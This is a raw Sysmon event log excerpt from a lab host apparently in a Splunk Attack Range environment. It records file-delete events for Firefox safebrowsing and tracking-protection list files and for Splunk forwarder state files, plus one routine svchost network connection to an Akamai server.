23542300x800000000000000035342627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:37.753{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4AAA32327C756B762EB65BC990D7E595,SHA256=8E72D447A1F72F1140B8D15F8731A9ECA7C0B5A74A110BB14E7B2CDAA58A36AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:37.753{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=19D2A39E5BA4148D90E123151D9236E1,SHA256=A9D6107FFBD01B722E0021B2CA72EF71C8059189FBD8ADC4447F9281CA9E13B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:37.016{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=942E91CBAA611B0AFB64277D5BF38DEF,SHA256=72423BC1B47EB7F9E7E45685467C3D1A838BB3F6906AF26906ADDF7C810BDE07,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.749{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=4389884605AD56EC50BF27FBD4CFB473,SHA256=60B552CBA048738FE850BA958CDDF9B742B6FAA7519F455D4B39437734725990,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.749{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=3F92B621E1581AD764BE2EC57381AF23,SHA256=18FBBA6D350213F61DF718195FD2B38A3B8344D0A5C22C2713E6F8944E9A9DD4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.749{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=8D76E0D31A687AE5A730C71C052C68E8,SHA256=6747A2FB92023CBF27E345AAC38B2BA7695A7DC5E9A42BD793D0CF6DAEAED260,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.749{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=DC7308A91A03C92D7329F37F15C7AC82,SHA256=180DDE904FFF036ABD4045A52850200ACA369E4577E14E0675E5298855A6AA0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.749{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=54971F1ADD787A9676F9DEFAB4C7FE3F,SHA256=FD890E3920CDFB62C1089C6119A8F8B713F81BDDAF7BEC925AFB4BDFB32AF5E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.749{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=0A19E4A237D65FF069452EF5201F217E,SHA256=AC5D43328F28E2B1159D014197F58D987C2AB78C9179DCD924524353571FA604,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.749{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=D95F203FEE1C8FAE222EF4C6D410971B,SHA256=1CA57763647104AEF83C8A86E8366FBBEE4BAA88C900C7AF66F437720319CEAB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.749{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=C0FE3CB314FDF424A4D4F1DE2801A4DF,SHA256=C4CA8CE5B3B8D038E3348887BDA7634D1949325BB95A68D17184D2A99F37E810,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.749{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=8DFE079ACC2ECC3A942CEB65DC1709E6,SHA256=84744C4DC9556DF6B18041511F4041EF5478CBC29617A85D13C428E3C901C277,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.734{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=B044FF38498893197EFFED666AED7D02,SHA256=F8EC6AE6E979869DC88C9CE2D370E9FE6F2689A8F7C68B2392B6FF1E94AE9498,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.734{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.734{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.734{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpsetMD5=C1BA06F0583B4D3CC4E41F1E4F8EF75E,SHA256=FE89222A35763FB6793FC64C441F35222128376E25A0002B9AB4F38DA261ECEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.734{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=BCFBACD8DA1020F786A84F601333F186,SHA256=EC99F1637B79AC97206D315F8465481AE709D68AF69E7F4E9C7112D9545FAEEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.734{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpsetMD5=CB337C862558A9110A463BF20E8CCC07,SHA256=A3C5446937F36C9A1A5481A28FB914B591BA51C6A8C62166CD61EC3D538758CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.669{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=CB9D856800CB9BA325DABEDD5CD7C1C0,SHA256=06025AE7D29A6E4A8C5D908EF8628CC8FD4D61D03EF13CD479BE9BA90B855212,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.667{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpsetMD5=76E48754FFA2B79B64FE8241DFD71ED7,SHA256=15F2741D7B86E4DB745150ED41E1C3FBFF4DB98C9CCEAEC0391285868455F311,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.649{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=AE68013D83424446E9B627F0301C2998,SHA256=CC71BF6E4D4CB02C50B68DAE0535F9C2E3C9A7F1B0F8D4EEACC6456C73315D70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.649{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpsetMD5=EA86E0097B81FDBDEE3F12AC90CA6410,SHA256=6A242B62530E38DDCFD272643F6CC44EDC0208C69DC3022D6CC273F4C7E79AF8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.649{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadataMD5=8DC78A562E1B268958A981D0AD7EAD74,SHA256=2A960282D759EAE224A8A47ABAD7A54DF042460DF0E5AC83A793FA822615FB83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.649{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpsetMD5=10AEEB36F61DD679136E390379B7CE9B,SHA256=A8CBA1484D349228B6D321CE529A40B0AE1F155CF8AEE3719FD7ADBAF55CFA61,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.649{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=4321A54F130A50EF926BAB0BF11425B8,SHA256=8892302AE988A95D942A5F2748E61B84E789AAD85C4F20C34812FA9D4F1B8984,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.649{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.634{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=5A35E65CADA1885B6796D1B3FE56E5F8,SHA256=35A1BF0FF6DD2B70DA5F89611891D413808DDE1510D03D788FF48A214AFA7CDD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.634{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.634{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.634{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:03.467{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local52447-false104.74.71.16a104-74-71-16.deploy.static.akamaitechnologies.com80http 23542300x800000000000000035342655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=E72E6B0165636DAE364CC43097FCD4E9,SHA256=3FE594D286D351B102E94676FD8A91B8FA0B3FDDD151336DDCE8C9BA2CFCFB50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=318288F5909637E0C3285C0942D72FF4,SHA256=F2BB9D40F7237C0E6D8EA96DFA2E864BD1264EB191C52BDBF16488D9466BC300,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=F7A173C65979416711FAFF47FADFBB44,SHA256=7F018CC32CF471750B6C5322E27E4F1C38097C414E7C6DC6AF9CF31E607431A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=5C71167AC9642FCF7752093F77FBBC89,SHA256=6714F7FBADCCB013DA1D8ECEFA6368A7D193E1F2460477F8AC304EDCF8637AA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=BFED06667174B0D03EE7F88A3DDC9A8C,SHA256=7AE5584755089D28C3A52DCF1EB86E62D4F2E377D61A7D549C6D4EBD53F39B26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=E6AAB64DC2799B4ECC6A6D18F86BD283,SHA256=D72FA31B50E9164371C5B7A3CCA257B99CE12D900FB07DEF942361D76299F5FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=16E5F327975AC215E9EFA4A4FC5262F5,SHA256=4698D628493E91E42494C8343B7E6469DFC1BFB1F771258C2FB556E84EF314B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=C3757E7620737B3B6500073B370852FE,SHA256=34B07244F673343E9AC1C775B455C0A60AA95439E83A70B0C6A24E504A88F4B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla 